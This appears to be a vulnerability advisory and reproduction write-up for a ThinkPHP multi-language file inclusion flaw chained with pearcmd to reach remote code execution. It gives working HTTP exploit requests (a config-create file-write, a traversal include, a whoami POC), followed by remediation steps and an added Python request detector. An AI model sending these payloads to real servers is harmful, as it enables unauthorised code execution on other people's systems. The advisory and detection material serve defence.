Introduction
ThinkPHP is a PHP framework. When its multi-language feature is enabled, the language value can be supplied through GET parameters, a request header, or a cookie, and that value is used in a file path; this allows directory traversal and local file inclusion, which in turn can be chained with inclusion of the pearcmd file to obtain remote command execution (RCE).
Preconditions:
1. ThinkPHP must have the multi-language feature enabled.
2. The pearcmd extension (PEAR) must be present on the target.
Affected versions
v6.0.1 < ThinkPHP < v6.0.13
ThinkPHP v5.0.x
ThinkPHP v5.1.x
Reproduction
Environment
docker run -it -d -p 8080:80 vulfocus/thinkphp:6.0.12
Then browse to port 8080.
File inclusion
Generate the file
GET /public/index.php?+config-create+/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
Host: 222.x.x.x:8080
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 0
think-lang:../../../../../../../../usr/local/lib/php/pearcmd
Cookie: think_lang=zh-cn;
Connection: close
Include the file
GET /public/index.php HTTP/1.1
Host: 222.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
think-lang:../../../../../../../../tmp/hello
Cookie: think_lang=zh-cn;
Connection: close
Directory traversal
/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=whoami
POC
GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=whoami HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Remediation
1. If the multi-language feature is not needed, disable it; see the documentation:
https://www.kancloud.cn/manual/thinkphp6_0/1037637
https://static.kancloud.cn/manual/thinkphp5/118132
2. The vendor has released 6.0.14 and 5.1.42; upgrading to a fixed version is recommended.
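For teams that cannot patch immediately, the following Python checker (an added example, not code from the original post or from ThinkPHP) applies a strict language-code allowlist to every place the requests above show ThinkPHP reading the language from (the think_lang route segment, the think-lang header, the think_lang cookie) and flags the pearcmd and traversal markers in the request line; the GET parameter name "lang", the lower-cased header names and the sample requests are assumptions modelled on the requests above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# A legitimate language code looks like "zh-cn" or "en_US"; a "/" or ".." can only be traversal.
SAFE_LANG = re.compile(r"^[A-Za-z0-9_-]{1,20}$")
# Substrings that have no business in a request to a ThinkPHP front controller.
BAD_MARKERS = ("pearcmd", "config-create", "../", "..\\")

def lang_candidates(path: str, headers: dict) -> list:
    """Collect every value ThinkPHP may treat as the language (header names assumed lower-cased)."""
    values = []
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    values += query.get("lang", [])  # GET switch name; "lang" is an assumption
    # Path-info routing: ...?s=index/index/index/think_lang/<value>
    for route in query.get("s", []):
        parts = route.split("/")
        if "think_lang" in parts:
            values.append("/".join(parts[parts.index("think_lang") + 1:]))
    if "think-lang" in headers:
        values.append(headers["think-lang"])
    for cookie in headers.get("cookie", "").split(";"):
        name, _, value = cookie.strip().partition("=")
        if name == "think_lang":
            values.append(value)
    return values

def analyse_request(path: str, headers: dict) -> list:
    """Return findings for one request; an empty list means nothing suspicious."""
    findings = []
    decoded = unquote(unquote(path)).lower()  # also unwrap double URL-encoding
    for marker in BAD_MARKERS:
        if marker in decoded:
            findings.append(f"marker {marker!r} in request line")
    for value in lang_candidates(path, headers):
        value = unquote(unquote(value))
        if not SAFE_LANG.match(value):
            findings.append(f"invalid language value {value!r}")
    return findings

# Constructed samples modelled on the requests above (not real log data).
SAMPLE_REQUESTS = [
    ("/public/index.php?+config-create+/<?=phpinfo()?>+/tmp/hello.php",
     {"think-lang": "../../../../../../../../usr/local/lib/php/pearcmd", "cookie": "think_lang=zh-cn"}),
    ("/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=whoami", {}),
    ("/index.php?lang=en-us", {"think-lang": "zh-cn", "cookie": "think_lang=zh-cn"}),
]

if __name__ == "__main__":
    for path, headers in SAMPLE_REQUESTS:
        print(path, "->", analyse_request(path, headers) or "clean")
```

The same allowlist (SAFE_LANG) is the check to enforce server-side, before the language value is ever joined into a file path.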